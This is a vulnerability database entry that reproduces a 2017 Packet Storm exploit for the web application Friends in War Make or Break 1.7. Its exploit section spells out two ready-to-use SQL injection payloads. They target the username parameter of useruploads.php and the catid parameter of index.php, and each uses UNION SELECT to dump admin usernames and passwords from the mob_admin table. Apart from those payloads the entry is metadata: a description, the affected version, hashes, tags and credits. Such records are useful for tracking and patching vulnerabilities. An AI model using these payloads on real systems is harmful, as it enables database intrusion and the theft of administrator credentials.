Sign-up

ID

VAR-E-201707-0372


TITLE

Friends In War Make Or Break 1.7 SQL Injection

Trust: 0.5

sources: PACKETSTORM: 143529

DESCRIPTION

Friends in War Make or Break version 1.7 suffers from a remote SQL injection vulnerability.

Trust: 0.5

sources: PACKETSTORM: 143529

AFFECTED PRODUCTS

vendor:friendsmodel:in war make or breakscope:eqversion:1.7

Trust: 0.5

sources: PACKETSTORM: 143529

EXPLOIT

# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #

Trust: 0.5

sources: PACKETSTORM: 143529

EXPLOIT HASH

LOCAL

SOURCE

md5: e8df9428d67775f61c7259affb58e5a5
sha-1: f88f6af28c0e4b614680dfcb6a687839255859d1
sha-256: 3e428a06a729d50e22f570bba3e4442fe85fee20da24dfbfaf5e621126710aed
md5: e8df9428d67775f61c7259affb58e5a5

Trust: 0.5

sources: PACKETSTORM: 143529

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 143529

TYPE

sql injection

Trust: 0.5

sources: PACKETSTORM: 143529

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:sql injection

Trust: 0.5

sources: PACKETSTORM: 143529

CREDITS

Ihsan Sencan

Trust: 0.5

sources: PACKETSTORM: 143529

EXTERNAL IDS

db:PACKETSTORMid:143529

Trust: 0.5

sources: PACKETSTORM: 143529

SOURCES

db:PACKETSTORMid:143529

LAST UPDATE DATE

2022-07-27T09:29:44.941000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:143529date:2017-07-27T16:44:22